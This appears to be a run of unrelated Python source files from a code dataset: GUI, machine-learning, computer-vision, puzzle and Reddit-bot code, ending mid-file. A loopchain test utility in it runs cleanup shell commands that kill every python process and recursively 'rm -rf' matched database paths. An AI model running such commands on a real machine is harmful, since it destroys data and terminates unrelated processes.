self._groupHideIfOff.append(widget)\n\n def _dilateChanged(self):\n value = int(self._qleDilatation.text())\n self._recons_params['DILATE'] = value\n\n def __buildMedianMedianFilterSize(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Median filter size', parent=widget))\n self._qleMedianFilterSize = qt.QLineEdit('', parent=widget)\n widget.layout().addWidget(self._qleMedianFilterSize)\n self.LinkLineEditWithH5Variable(self._qleMedianFilterSize, 'MEDIANR', int)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _medianRChanged(self):\n value = int(self._qleMedianFilterSize.text())\n self._recons_params['MEDIANR'] = value\n\n def __buidMKeep(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QVBoxLayout())\n self._qcbKeepBone = qt.QCheckBox('Keep a separate volume for high absorption part', parent=widget)\n widget.layout().addWidget(self._qcbKeepBone)\n self.linkCheckboxWithH5Variable(self._qcbKeepBone, 'MKEEP_BONE')\n self._qcbKeepSoft = qt.QCheckBox('Keep a separate volume for low absorption part', parent=widget)\n widget.layout().addWidget(self._qcbKeepSoft)\n self.linkCheckboxWithH5Variable(self._qcbKeepSoft, 'MKEEP_SOFT')\n self._qcbKeepAbs = qt.QCheckBox('Keep a separate volume for absorption reconstruction', parent=widget)\n widget.layout().addWidget(self._qcbKeepAbs)\n self.linkCheckboxWithH5Variable(self._qcbKeepAbs, 'MKEEP_ABS')\n self._qcbKeepCorr = qt.QCheckBox('Keep binary mask (bone absorption - average neighbours)', parent=widget)\n widget.layout().addWidget(self._qcbKeepCorr)\n self.linkCheckboxWithH5Variable(self._qcbKeepCorr, 'MKEEP_CORR')\n self._qcbKeepMask = qt.QCheckBox('Keep the binary mask', parent=widget)\n widget.layout().addWidget(self._qcbKeepMask)\n self.linkCheckboxWithH5Variable(self._qcbKeepMask, 'MKEEP_MASK')\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _keepBoneChanged(self, b):\n self._recons_params['MKEEP_BONE'] = b\n\n def _keepSoftChanged(self, b):\n self._recons_params['MKEEP_SOFT'] = b\n\n def _keepAbsChanged(self, b):\n self._recons_params['MKEEP_ABS'] = b\n\n def _keepCorrChanged(self, b):\n self._recons_params['MKEEP_CORR'] = b\n\n def _keepMaskChanged(self, b):\n self._recons_params['MKEEP_MASK'] = b\n\n def getPaganinMode(self):\n return self._qcbpaganin.currentText()\n\n def __updatePaganinMode(self, newindex):\n [widget.setVisible(newindex is not 0) for widget in self._groupHideIfOff]\n [widget.setVisible(newindex is 3) for widget in self._groupHideIfNotMulti]\n\n\nclass PaganinRangeWidget(PaganinWidget):\n\n def _buildAlphaBetaWidgets(self, widget):\n self.paganinModeOpt = qt.QWidget(widget)\n self.paganinModeOpt.setLayout(qt.QGridLayout())\n label = DELTA_CHAR + ' / ' + BETA_CHAR\n self.paganinModeOpt.layout().addWidget(qt.QLabel(label, parent=widget), 1, 0)\n self._qleSigmaBeta = SelectionLineEdit(text='0', parent=self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta, 1, 1)\n self.LinkSelectionLineEditWithH5Variable(self._qleSigmaBeta, 'DB', str)\n label_multi = DELTA_CHAR + ' / ' + BETA_CHAR + ' (multi)'\n lMulti = qt.QLabel(label_multi, parent=widget)\n self.paganinModeOpt.layout().addWidget(lMulti)\n self._qleSigmaBeta2 = SelectionLineEdit(text='0', parent=self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta2, 2, 1)\n self.LinkSelectionLineEditWithH5Variable(self._qleSigmaBeta2, 'DB2', str)\n self._groupHideIfNotMulti.append(lMulti)\n self._groupHideIfNotMulti.append(self._qleSigmaBeta2)\n widget.layout().addWidget(self.paganinModeOpt, 1, 1)\n\n def _DBChanged(self):\n value = self._qleSigmaBeta.selection\n self._recons_params['DB'] = value\n\n def _DB2Changed(self):\n value = self._qleSigmaBeta2.selection\n self._recons_params['DB2'] = value","sub_path":"pycfiles/tomwer-0.4.0.linux-x86_64.tar/paganinwidget.cpython-37.py","file_name":"paganinwidget.cpython-37.py","file_ext":"py","file_size_in_byte":12914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"375351235","text":"#!/usr/bin/env python\n\"\"\"Train a model to predict actions given observations\n Parameters: Filename of pickled dictionary with keys \"observations\", \"actions\"\n\"\"\"\n\n\nimport pickle\nimport tensorflow as tf\nimport numpy as np\n\n\ndef model(observations, actions, dirName):\n Label_Dimension=actions.shape[1]\n Feature_Dimension=observations.shape[1]\n\n feature_column = [tf.contrib.layers.real_valued_column(\"\", dimension=Feature_Dimension)]\n\n estimator = tf.contrib.learn.DNNRegressor(\n feature_columns=feature_column,\n hidden_units=[64,64],\n #activation_fn = tf.nn.relu,\n activation_fn = tf.tanh,\n model_dir = \"./trained/\"+dirName,\n label_dimension=Label_Dimension\n )\n\n def input_fn_train(): # returns x, Y \n return {\"\": tf.constant(observations, dtype=tf.float32)}, \\\n tf.constant(actions, dtype=tf.float32)\n\n print(\"shape of observations\", observations.shape, \"shape of actions \", actions.shape)\n estimator.fit(input_fn=input_fn_train, steps = 3000)\n print(\"fitting done\")\n # check how well the model fits the training data\n ev = estimator.evaluate(input_fn=input_fn_train, steps = 2)\n loss_score = ev[\"loss\"]\n print(\"Loss: {0:f}\".format(loss_score))\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('expert_policy_file', type=str)\n\n args = parser.parse_args()\n\n data = pickle.load(open(\"./trainingData/\"+args.expert_policy_file, \"rb\"))\n\n observations = data[\"observations\"]\n actions = np.squeeze(data[\"actions\"])\n print(\"observations.shape \", observations.shape)\n print(\"actions.shape \", actions.shape)\n\n tf.logging.set_verbosity(tf.logging.INFO)\n\n model(observations, actions, args.expert_policy_file)\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw1/ImitationLearning.py","file_name":"ImitationLearning.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"534286141","text":"'''\n#include\nint main()\n{\n int n,i,j,arr[902],pre[901],ans=0;\n scanf(\"%d%d\",&n,&arr[0]);\n pre[0]=arr[0];\n for(i=1;ians)\n ans=pre[i]^(pre[j]-pre[k]);\n if((arr[i]^(pre[j]-pre[k]))>ans)\n ans=arr[i]^(pre[j]-pre[k]);\n }\n}\n}\nprintf(\"%d\",ans);\nreturn 0;\n}\n4\n1 2 1 3\n'''\nnoe = int(input())\npre = [0] * (noe + 1)\narr = [int(x) for x in input().split()]\npre[0] = arr[0]\nfor i in range(1, noe):\n pre[i] = arr[i] + pre[i-1]\nans = 0\nfor i in range(1, noe-1):\n for j in range(i+1, noe):\n for k in range(i, j):\n var1 = pre[i] ^ (pre[j] - pre[k])\n ans = max(ans, var1)\n print(var1, ans, pre[i], pre[j], pre[k])\n var2 = arr[i] ^ (pre[j] - pre[k])\n ans = max(ans, var2)\n print(var2, ans)\nprint(ans)\n\n\n\n","sub_path":"HackerEarth/subham_and_subarray_xor.py","file_name":"subham_and_subarray_xor.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392407405","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"util functions for unittest\"\"\"\n\nimport asyncio\nimport json\nimport logging\nimport os\nimport random\nimport time\nfrom sys import platform\n\nimport loopchain\nimport loopchain.utils as util\nfrom loopchain import configure as conf\nfrom loopchain.baseservice import StubManager, CommonSubprocess\nfrom loopchain.blockchain.blocks import Block\nfrom loopchain.blockchain.transactions import Transaction, TransactionBuilder, TransactionVersioner\nfrom loopchain.blockchain.types import Address\nfrom loopchain.components import SingletonMetaClass\nfrom loopchain.peer import Signer\nfrom loopchain.protos import loopchain_pb2, loopchain_pb2_grpc\nfrom loopchain.store.key_value_store import KeyValueStoreError, KeyValueStore\nfrom loopchain.utils import loggers\nfrom loopchain.utils.message_queue import StubCollection\n\nloggers.set_preset_type(loggers.PresetType.develop)\nloggers.update_preset()\n\n\ndef run_peer_server_as_process(port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None):\n args = ['python3', 'loopchain.py', 'peer', '-d', '-p', str(port),\n '-r', f\"{util.get_private_ip()}:{radiostation_port}\"]\n logging.debug(f\"run_peer_server_as_process ({args})\")\n return CommonSubprocess(args)\n\n\ndef run_peer_server_as_process_and_stub(\n port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None, wait=True):\n if timeout is None:\n timeout = conf.TIMEOUT_FOR_PEER_INIT\n\n process = run_peer_server_as_process(port, radiostation_port, group_id, score)\n\n async def _wait():\n StubCollection().amqp_target = conf.AMQP_TARGET\n StubCollection().amqp_key = f\"{util.get_private_ip()}:{port}\"\n\n logging.debug(f'{StubCollection().amqp_key} peer hello')\n\n await StubCollection().create_peer_stub()\n await StubCollection().peer_stub.async_task().hello()\n\n logging.debug(f'{StubCollection().amqp_key} peer hello complete')\n\n if wait:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n try:\n future = asyncio.ensure_future(_wait())\n loop.run_until_complete(future)\n loop.stop()\n loop.close()\n except Exception as e:\n logging.warning(f\"Exception in loop : {e}\")\n\n stub, channel = util.get_stub_to_server(f\"localhost:{port}\", stub_class=loopchain_pb2_grpc.PeerServiceStub)\n return process, stub\n\n\ndef run_peer_server_as_process_and_stub_manager(\n port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None):\n process = run_peer_server_as_process(port, radiostation_port, group_id, score)\n stub_manager = StubManager(f\"localhost:{port}\", loopchain_pb2_grpc.PeerServiceStub, ssl_auth_type=conf.GRPC_SSL_TYPE)\n return process, stub_manager\n\n\ndef run_radio_station_as_process(port):\n args = ['python3', 'loopchain.py', 'rs', '-d', '-p', str(port)]\n logging.debug(f\"run_radio_station_as_process ({args})\")\n return CommonSubprocess(args)\n\n\ndef run_radio_station_as_process_and_stub_manager(port, timeout=None):\n process = run_radio_station_as_process(port)\n stub_manager = StubManager(f\"localhost:{port}\",\n loopchain_pb2_grpc.RadioStationStub,\n conf.GRPC_SSL_TYPE)\n util.request_server_in_time(stub_manager.stub.GetStatus, loopchain_pb2.StatusRequest(request=\"\"))\n return process, stub_manager\n\n\ndef run_radio_station_as_process_and_stub(port):\n process = run_radio_station_as_process(port)\n\n stub, channel = util.get_stub_to_server(\n target=f\"localhost:{port}\",\n stub_class=loopchain_pb2_grpc.RadioStationStub\n )\n\n return process, stub\n\n\ndef run_score_server_as_process(amqp_key):\n args = ['python3', 'loopchain.py', 'score',\n '--channel', conf.LOOPCHAIN_DEFAULT_CHANNEL,\n '--amqp_key', amqp_key,\n '--score_package', \"score_package\",\n '-d']\n logging.debug(f\"run_score_server_as_process ({args})\")\n return CommonSubprocess(args)\n\n\nasync def run_score_server_as_process_and_stub_async():\n amqp_key = str(time.time())\n process = run_score_server_as_process(amqp_key)\n\n StubCollection().amqp_target = conf.AMQP_TARGET\n StubCollection().amqp_key = amqp_key\n\n logging.debug(f'{StubCollection().amqp_key} score hello')\n\n await StubCollection().create_score_stub(conf.LOOPCHAIN_DEFAULT_CHANNEL, 'score_package')\n await StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL].async_task().hello()\n\n logging.debug(f'{StubCollection().amqp_key} score hello complete')\n\n return process, StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL]\n\n\ndef print_testname(testname):\n print(\"\\n======================================================================\")\n print(\"Test %s Start\" % testname)\n print(\"======================================================================\")\n\n\ndef make_key_value_store(store_identity=\"\") -> KeyValueStore:\n store_default_path = './' + (store_identity, \"db_test\")[store_identity == \"\"]\n store_path = store_default_path\n store = None\n retry_count = 0\n\n while store is None and retry_count < conf.MAX_RETRY_CREATE_DB:\n try:\n uri = f\"file://{store_path}\"\n store = KeyValueStore.new(uri, create_if_missing=True)\n logging.debug(f\"make key value store uri: {uri}\")\n except KeyValueStoreError:\n store_path = store_default_path + str(retry_count)\n retry_count += 1\n\n return store\n\n\ndef close_open_python_process():\n # ubuntu patch\n if platform == \"darwin\":\n os.system(\"pkill -f python\")\n os.system(\"pkill -f Python\")\n else:\n os.system(\"pgrep -f python | tail -$((`pgrep -f python | wc -l` - 1)) | xargs kill -9\")\n\n\ndef clean_up_temp_db_files(kill_process=True):\n from pathlib import Path\n loopchain_root = Path(os.path.dirname(loopchain.__file__)).parent\n\n if kill_process:\n close_open_python_process()\n\n print(f\"loopchain root : {loopchain_root}\")\n\n os.system(f'rm -rf $(find {loopchain_root} -name db_*)')\n os.system(f'rm -rf $(find {loopchain_root} -name *test_db*)')\n os.system(f'rm -rf $(find {loopchain_root} -name *_block)')\n os.system(f\"rm -rf {loopchain_root}/testcase/db_*\")\n os.system(f\"rm -rf {loopchain_root}/.storage\")\n time.sleep(1)\n\n\ndef clean_up_mq():\n os.system(\"rabbitmqctl stop_app\")\n os.system(\"rabbitmqctl reset\")\n os.system(\"rabbitmqctl start_app\")\n\n\ndef create_basic_tx(peer_auth: Signer) -> Transaction:\n \"\"\"\n :param peer_auth:\n :return: transaction\n \"\"\"\n tx_builder = TransactionBuilder.new(\"0x3\", TransactionVersioner())\n tx_builder.private_key = peer_auth._private_key\n tx_builder.to_address = Address(\"hx3f376559204079671b6a8df481c976e7d51b3c7c\")\n tx_builder.value = 1\n tx_builder.step_limit = 100000000\n tx_builder.nid = 3\n return tx_builder.build()\n\n\ndef add_genesis_block():\n tx_info = None\n channel = conf.LOOPCHAIN_DEFAULT_CHANNEL\n\n if \"genesis_data_path\" in conf.CHANNEL_OPTION[channel]:\n genesis_data_path = conf.CHANNEL_OPTION[channel]['initial_genesis_block_data_file_path']\n util.logger.spam(f\"Try load a file of initial genesis block from ({genesis_data_path})\")\n try:\n with open(genesis_data_path) as json_file:\n tx_info = json.load(json_file)[\"transaction_data\"]\n util.logger.spam(f\"generate_genesis_block::tx_info >>>> {tx_info}\")\n\n except FileNotFoundError as e:\n exit(f\"cannot open json file in ({genesis_data_path}): \"\n f\"{e}\")\n\n block = Block(channel_name=channel)\n block.block_status = BlockStatus.confirmed\n genesis_validator = get_genesis_tx_validator(channel)\n is_valid, tx = genesis_validator.init_genesis_tx(tx_info)\n\n if is_valid:\n block.put_genesis_transaction(tx)\n\n block.generate_block()\n # 제네시스 블럭을 추가 합니다.\n return block\n\n\nclass TestServerManager(metaclass=SingletonMetaClass):\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n self.__test_port_diff = random.randrange(1, 30) * -50\n self.__radiostation_port = conf.PORT_RADIOSTATION + self.__test_port_diff\n\n # rs and peer info is tuple (process, stub_manager, port)\n self.__rs_info = ()\n self.__peer_info = {} # {num:peer_info}\n self.__score = None\n\n def start_servers(self, peer_count, score=None):\n \"\"\"Start BlockChain network rs and peer\n\n :param peer_count: num of peers but 0 means start only RS.\n :return:\n \"\"\"\n logging.debug(\"TestServerManager start servers\")\n self.__score = score\n\n # run radio station\n process, stub_manager = run_radio_station_as_process_and_stub_manager(self.__radiostation_port)\n self.__rs_info = (process, stub_manager, self.__radiostation_port)\n time.sleep(2)\n\n for i in range(peer_count):\n peer_port = conf.PORT_PEER + (i * 7) + self.__test_port_diff\n process, stub_manager = run_peer_server_as_process_and_stub_manager(\n peer_port, self.__radiostation_port, score=score)\n self.__peer_info[i] = (process, stub_manager, peer_port)\n time.sleep(2)\n\n def stop_all_server(self):\n for i in self.__peer_info:\n self.__peer_info[i][1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n self.__rs_info[1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n\n time.sleep(2)\n\n for i in self.__peer_info:\n self.__peer_info[i][0].join()\n self.__rs_info[0].join()\n\n def stop_peer(self, num):\n self.__peer_info[num][1].call_in_times(\n \"Stop\",\n loopchain_pb2.StopRequest(reason=\"TestServerManager\"), conf.GRPC_TIMEOUT)\n time.sleep(2)\n self.__peer_info[num][0].join()\n\n def start_peer(self, num):\n peer_port = conf.PORT_PEER + (num * 7) + self.__test_port_diff\n process, stub_manager = run_peer_server_as_process_and_stub_manager(\n peer_port, self.__radiostation_port, score=self.__score)\n self.__peer_info[num] = (process, stub_manager, peer_port)\n time.sleep(1)\n\n def add_peer(self):\n num = 0\n return num\n\n def get_stub_rs(self):\n return self.__rs_info[1].stub\n\n def get_stub_peer(self, num=0):\n return self.__peer_info[num][1].stub\n\n def get_port_rs(self):\n return self.__radiostation_port\n\n def get_port_peer(self, num):\n return self.__peer_info[num][2]\n\n def status(self):\n \"\"\"\n\n :return: json object for ServerManager status\n \"\"\"\n pass\n","sub_path":"testcase/unittest/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":11465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"650500287","text":"#!/usr/bin/env python\n\nfrom keras.layers import Input,Dense,LSTM,RepeatVector,concatenate,Conv2D,MaxPooling2D,Dropout,Flatten,UpSampling2D\nfrom keras.models import Model,Sequential\n\nimport keras\n\ndef model_type_1(n_neurons,seq_length, featureSize):\n\tmodel = Sequential()\n\tmodel.add(LSTM(n_neurons, input_shape=(seq_length, featureSize)))\n\tmodel.add(Dense(6,activation='linear'))\n\tmodel.compile(loss='mean_squared_error', optimizer='adam')\n\treturn model\n\ndef model_type_2(n_neurons,seq_length, featureSize):\n\tsupports = Input(shape=(FeatureSize-6,),name='supports')\n\ttraj = Input(shape=(seq_length,6,),name='traj')\n \n\tsupports_Dense = Dense(1000,activation='relu')(supports)\n\tsupports_Dense = Dropout(0.25)(supports_Dense)\n\n\trepeated_supp = RepeatVector(seq_length)(supports_Dense)\n\tconcat_layer = concatenate([traj, repeated_supp])\n\tlstm_layer = LSTM(n_neurons)(concat_layer)\n\toutput = Dense(6,activation='linear',name='output')(lstm_layer)\n\tmodel = Model(inputs=[supports, traj], outputs=[output])\n\tmodel.compile(optimizer='adam',\n loss={'output': 'mean_squared_error'})\n\treturn model\n \ndef model_type_3(n_neurons,seq_length, featureSize):\n\timages = Input(shape=(128,128,1,),name='supports')\n\n\tx = Conv2D(32, (3, 3), activation='relu', padding='same')(images)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), activation='relu', padding='same')(x)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), activation='relu', padding='same')(x)\n\tx = MaxPooling2D((2, 2), padding='same')(x)\n\tx = Conv2D(64, (3, 3), activation='relu', padding='same')(x)\n\tencoded = MaxPooling2D((2, 2), padding='same')(x)\n\n\tflattened= Flatten()(encoded)\n\n\tsupports_Dense = Dense(1000,activation='relu')(flattened)\n\tsupports_Dense = Dropout(0.25)(supports_Dense)\n\n\ttraj = Input(shape=(seq_length,6,),name='traj')\n\tnoise = Input(shape=(seq_length,10,),name='noise')\n\n\trepeated_supp = RepeatVector(seq_length)(supports_Dense)\n\tconcat_layer = concatenate([traj, repeated_supp,noise])\n\tlstm_layer = LSTM(n_neurons)(concat_layer)\n\toutput = Dense(6,activation='linear',name='output')(lstm_layer)\n\tmodel = Model(inputs=[images, traj,noise], outputs=[output])\n\tmodel.compile(optimizer='adam',\n loss={'output': 'mean_absolute_error'})\n\treturn model \n","sub_path":"Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"237874034","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n\ndef HW6():\n \"\"\"Part 1: Read the left and right images. Detect SIFT features on each image.\n Match the features using nearest neighbor matching and the ratio test.\n \"\"\"\n img1 = cv2.imread('plushies_right.png')\n img2 = cv2.imread('plushies_left.png')\n RESIZE = 0.25\n size = int(img1.shape[1]*RESIZE), int(img1.shape[0]*RESIZE)\n img1 = cv2.resize(img1, size)\n img2 = cv2.resize(img2, size)\n kp1, des1 = SIFT(img1)\n kp2, des2 = SIFT(img2)\n # Create a \"brute force\" matcher (BFMatcher) object.\n bf = cv2.BFMatcher()\n # 2.At each video frame, compute the first two nearest-neighbor matches for each keypoint in the video frame\n matches = bf.knnMatch(des1, des2, k=2)\n # 4. Draw the matches between the video frame and the target image using cv.drawMatches()\n # 3.Apply the \"ratio test\" to filter out unreliable matches, using a threshold of 0.7\n # store all the good matches as per Lowe's ratio test.\n good = []\n src_pts = []\n dst_pts = []\n for m, n in matches:\n if m.distance < 0.8 * n.distance:\n good.append(m)\n MIN_MATCH_COUNT = 10\n\n\n if len(good) > MIN_MATCH_COUNT:\n src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1,2)\n dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1,2)\n # 1.Fit a homography to the matches using findHomography() with the RANSAC option.\n # Note that you might need to invert the resulting homography matrix using np.linalg.inv().\n draw_params = dict(matchColor=(0, 255, 0), # draw matches in green color\n singlePointColor=None,\n matchesMask=None, # draw only inliers\n flags=2)\n inlier_matches = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)\n \"\"\"Part 2: Estimate the essential matrix between the two images using cv.findEssentialMatrix() and the cv.RANSAC option.\n Decompose the essential matrix into a translation vector and two possible rotation vectors using cv.decomposeEssentialMatrix().\n Choose the rotation matrix with no negative numbers on the diagonal as the correct one.\"\"\"\n fx = fy = 485.82423388827533 # focal length\n cx = 134.875 # principle point\n cy = 239.875 # principle point\n K = np.array([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])\n E, mask = cv2.findEssentialMat(src_pts, dst_pts, K, method=cv2.RANSAC)\n R1, R2, t = cv2.decomposeEssentialMat(E)\n R = R1 if diag_pos(R1) else R2\n \"\"\"Part 3: Rectify the two images using cv.stereoRectify(), cv.initUndistortRectifyMap() and cv.remap().\n Estimate the stereo disparity using StereoBM. I recommend a max disparity of 32. Show the disparity map.\"\"\"\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(K, None, K, None, size, R, t)\n map_x1, map_y1 = cv2.initUndistortRectifyMap(K, None, R1, K, size, cv2.CV_32FC1)\n map_x2, map_y2 = cv2.initUndistortRectifyMap(K, None, R2, K, size, cv2.CV_32FC1)\n dst1 = cv2.remap(img1, map_x1, map_y1, cv2.INTER_LANCZOS4)\n dst2 = cv2.remap(img2, map_x2, map_y2, cv2.INTER_LANCZOS4)\n stereo = cv2.StereoBM_create(numDisparities=32, blockSize=5)\n disparity = stereo.compute(cv2.cvtColor(dst1, cv2.COLOR_BGR2GRAY),\n cv2.cvtColor(dst2, cv2.COLOR_BGR2GRAY))\n\n plt.imshow(disparity, 'gray')\n cv2.imshow('dst1', dst1)\n cv2.imshow('dst2', dst2)\n cv2.imshow('matches', inlier_matches)\n plt.show()\n else:\n print(\"Not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n #cv2.imshow('inliner matches', inlier_matches)\n while cv2.waitKey(1) != ord('q'):\n 1\n\n\n\n\n\n\n\n\ndef SIFT(img1):\n # part 1\n # 1.Load the \"stones\" image and convert it to grayscale.\n\n gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n # 2.Detect SIFT features and compute descriptors for them using sift.detectAndCompute().\n sift = cv2.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(gray, None)\n return kp, des\n\ndef diag_pos(M):\n pos = True\n for i in range(M.shape[0]):\n if M[i][i] < 0:\n print(M[i][i])\n pos = False\n return pos\n\n\nif __name__ == '__main__':\n HW6()\n","sub_path":"HW6/HW6.py","file_name":"HW6.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"83845982","text":"#!/usr/bin/python3\n\nimport sqlite3\nimport time\nimport praw\nimport prawcore\nimport requests\nimport os\nimport datetime\nimport Config\nimport logging\nimport re\nimport dateparser\n\nos.environ['TZ'] = 'UTC'\n\nfrom bs4 import BeautifulSoup\nreddit = praw.Reddit(client_id=Config.cid,\n client_secret=Config.secret,\n password=Config.password,\n user_agent=Config.agent,\n username=Config.user)\nsubreddit = reddit.subreddit(Config.subreddit)\n\napppath='/home/reddit/gamedealsbot/'\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=apppath+'reddit_response.log',\n filemode='a')\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\n\nclass Error(Exception):\n \"\"\"Base class\"\"\"\n pass\n\nclass LinkError(Error):\n \"\"\"Could not parse the URL\"\"\"\n pass\n\n# make an empty file for first run\nf = open(apppath+\"postids.txt\",\"a+\")\nf.close()\n\n\ndef getsteamexpiry(steamurl):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'}\n cookies = {\n 'wants_mature_content': '1',\n 'birthtime': '-2148631199',\n 'lastagecheckage': '1-0-1902' }\n r = requests.get(steamurl, headers=headers, cookies=cookies )\n # Offer ends 13 June

\n if re.search(\"\\$DiscountCountdown\", r.text) is not None:\n match1 = re.search(\"\\$DiscountCountdown, ([\\d]+)\", r.text)\n return match1.group(1)\n elif re.search(\"Offer ends ([\\w\\ ]+)

\", r.text) is not None:\n match1 = re.search(\"Offer ends ([\\w\\ ]+)

\", r.text)\n enddate= dateparser.parse( \"10am \" + match1.group(1) , settings={'PREFER_DATES_FROM': 'future', 'TIMEZONE': 'US/Pacific','TO_TIMEZONE': 'UTC' } )\n return time.mktime( enddate.timetuple() )\n return\n\n\n\ndef logID(postid):\n f = open(apppath+\"postids.txt\",\"a+\")\n f.write(postid + \"\\n\")\n f.close()\n\n\ndef respond(submission):\n post_footer = True\n footer = \"\"\"\n\nIf this deal has expired, you can reply to this comment with `\"\"\"+Config.expired_trigger+\"\"\"` to automatically close it. \nIf this deal has been mistakenly closed or has been restocked, you can open it again by replying with `\"\"\"+Config.restore_trigger+\"\"\"`. \n[^(more information)](https://www.reddit.com/r/GameDeals/wiki/gamedealsbot) \n^(Note: To prevent abuse, requests are logged publicly. Intentional abuse will likely result in a ban.)\n\"\"\"\n\n reply_reason = \"Generic Post\"\n reply_text = \"\"\n\n### Find all URLS inside a .self post\n urls = []\n if submission.author.name == \"gamedealsmod\":\n logging.info(\"gamedealsmod posted, skipping: \" + submission.title)\n return\n if submission.is_self:\n urls = re.findall('(?:(?:https?):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-?=%.]+', submission.selftext)\n if len(urls) == 0:\n logging.info(\"NO LINK FOUND skipping: \" + submission.title)\n logID(submission.id)\n return\n # remove duplicate URLs\n unique_urls = []\n for url in urls:\n if url in unique_urls:\n continue\n else:\n unique_urls.append(url)\n\n url = urls[0] ### use only the first url\n### get url for link post\n if not submission.is_self:\n url = submission.url\n\n\n if \"epicgames.com\" in url.lower():\n if \"free\" in submission.title.lower():\n postdate = dateparser.parse( str(submission.created_utc) , settings={'TO_TIMEZONE': 'US/Pacific', 'TIMEZONE': 'UTC' } )\n\n# if postdate.hour < 8 or postdate.hour > 9: # used for xmas rule, before being permanently disabled via AM to block community posting due to excessive need to moderate\n if postdate.weekday() == 3 and postdate.hour < 8: # removed for EGS's 15 days of games to make the rule more active\n logging.info( \"removing early EGS post | https://redd.it/\" + submission.id )\n reply = \"* We require a deal to be live before posting a submission.\"\n reply = \"* Either this deal has already been submitted,\\n\\n* Or this deal has been submitted before it is live.\"\n comment = submission.reply(\"Unfortunately, your submission has been removed for the following reasons:\\n\\n\" +\n reply +\n \"\\n\\nI am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](https://www.reddit.com/message/compose/?to=/r/GameDeals) if you have any questions or concerns.\"\n )\n submission.mod.remove()\n comment.mod.distinguish(sticky=True)\n logID(submission.id)\n return\n\n\n if re.search(\"store.steampowered.com/(sub|app)\", url) is not None:\n if submission.author_flair_css_class is not None and submission.is_self:\n return\n r = requests.get( url )\n\n if re.search(\"WEEK LONG DEAL\", r.text) is not None:\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n datetext = monday.strftime('%Y%m%d')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklongdeals WHERE week = ' + datetext )\n rows = cursorObj.fetchall()\n if len(rows) == 0:\n removereason = \"* It appears to be a part of the Weeklong deals. \\n\\nAs there are multiple games on sale, please post a thread with more games in the title [with this link](https://store.steampowered.com/search/?filter=weeklongdeals).\\n\\nIf you are the developer or publisher of this game, please leave a detailed disclosure as a top level comment as per 